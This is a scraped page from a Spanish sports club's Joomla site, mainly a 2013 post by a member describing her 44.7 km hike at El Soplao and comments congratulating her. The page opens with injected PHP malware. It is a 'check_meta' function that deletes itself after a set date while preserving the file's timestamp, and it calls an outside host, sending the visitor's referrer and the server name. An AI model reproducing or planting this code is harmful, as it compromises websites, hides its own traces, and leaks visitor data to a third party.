check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Ruta a pie !!El Soplao de Elena!!

La Afición

Calendario

<<  Marzo 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
    1  2  3  4  5
  6  7  8  9101112
13141516171819
20212223242526
2728293031  
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Ruta a pie !!El Soplao de Elena!! PDF Imprimir E-mail
Lunes, 27 de Mayo de 2013 23:23

Hola Chicos! No sé si será tarde pero no he tenido tiempo antes, aquí os mando mi experiencia del Soplao. Tardé un poco más en decidirme si me apuntaba o no, pero las mañas de Alex consiguieron convencerme.

Una vez realizada la inscripción comencé a "entrenar", todo iba viento en popa, sacaba tiempo para andar y correr un ratillo todos los días.

 

Llegó Semana Santa y en mis planes estaba seguir preparándome pero más a fondo; todo se trunco y lo deje de lado, tenía otras preocupaciones aunque nunca se me olvidaba que pronto llegaría ese 18 de Mayo "El Soplao".

El miércoles antes de la marcha tan esperada Tiñan me dice que podemos ir, lo cual me llena de alegría y me da mucha energía, aunque mis piernas no andarían más por eso, ayudaba mucho, al igual que los ánimos de todos los que me animaron desde el principio.

El jueves por la noche veo que mis palos están en Silos, no puedo ir a por ellos, una amiga muy importante en este tiempo de "preparación" me presta los suyos y me anima una vez más, (gracias por tu gran apoyo, fue muy importante), otro obstáculo salvado, ahora queda el más duro, eso 44.700 km por las montañas de Cabezón de la Sal.

El viernes salimos cargados de ánimos para allí, con los btteros, todos con muchas ganas y por supuesto nuestras bufandas del Club Deportivo Silos.

Uff que nervios, que de gente y yo un mes sin hacer nada, bueno lo intentaré, salgo con mucha emoción pero sola, el resto del equipo no había llegado aún a la salida, aunque sabía que estaban, ya que Kami me había llamado.

Bueno poco a poco voy subiendo y veo que las piernas parece que responden, en Ruente recojo muchiiiisimas energías ya que está Rodrigo, Gael, Tinin Y Javi, también recibo ánimos por teléfono, que guay!!! que ilusión, ahora ya no tenía disculpa, había que llegar a meta y dedicárselo.

Durante varios Km disfruté del paisaje, hasta que me uní a Elena, Juan (que marcha llevabas) y Miguel, tres compañeros que me animaron en los momentos difíciles, "gracias chicos", y desde entonces también disfrute de su maravillosa compañía.

Seguía sin ver a nadie de Silos pero el móvil me informaba de que todo parecía ir bien.

En el avituallamiento saque mi bufanda del Club toda orgullosa a ver si alguien de Silos la veía, pero nada, asique continúe con mis tres compañeros a por el famoso "Toral".

Antes de empezar a subir Tinin me informa que Ana Rosa ya ha llegado, "que guay!!!!!! Ya tenemos una campeona, enhorabuena maquina!

Uff que duro subir, menos mal que no llovió hasta que no llegamos a la cima, donde cómo no! bufanda del Club y foto conmemoratoria.

Ya solo quedan 7 Km, que duros, no por el ascenso que ya no había, sino por lo que mis pies llevaban a cuestas, pero pensar en llegar era algo impresionante solo quedaba medio Km para llegar, llamo para avisar y allí estaban, el primero Javi (gracias enano por tu infinito apoyo), que guay verle, pero más adelante el resto del equipo Tinin con Gael y Rodrigo, los cuales entraron en meta conmigo, ellos fueron mi energía, gracias enanos os lo dedico!! Y por supuesto el resto muy necesario, César, Ana Rosa, Constanza, Adolfo, Manolo, Miguel, Nuria y Adrián, gracias a todos, fuisteis muy necesarios es una sensación maravillosa llegar y veros allí a todos.

Fue una experiencia magnifica, quizá más porque pensé no conseguirlo, pero gracias a todos los que me apoyaron, "LO CONSEGUIMOS".

 

Gracias, hasta la próxima.

 

Comentarios  

 
+2 #5 Kami 28-05-2013 15:35
Yo creo que nadie tenía duda que podías con esto y con muuuuuuucho más!!!!
Citar
 
 
+3 #4 Rodrigo Diaz dVivar 28-05-2013 14:57
Cito a enano:
Tienes más coj... que el Cid

:-* Tu enano!!! Cuando puedas pasas por mi castillo. Te tengo que enseñar una cosita.
Citar
 
 
+3 #3 yolanda 28-05-2013 09:25
siempre pensé que lo conseguirías y lo has conseguido, estoy orgullosa de tenerte a mi lado,eres mi "hermana" pequeña. un beso campeona
Citar
 
 
+3 #2 enano 28-05-2013 09:12
Tienes más coj... que el Cid
Citar
 
 
+2 #1 Silense justo 28-05-2013 08:54
Eres una campeona por el esfuerzo y el orgullo de ser de Silos.un abrazo. Deportivo Silos!!!!!!!!!
Citar
 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.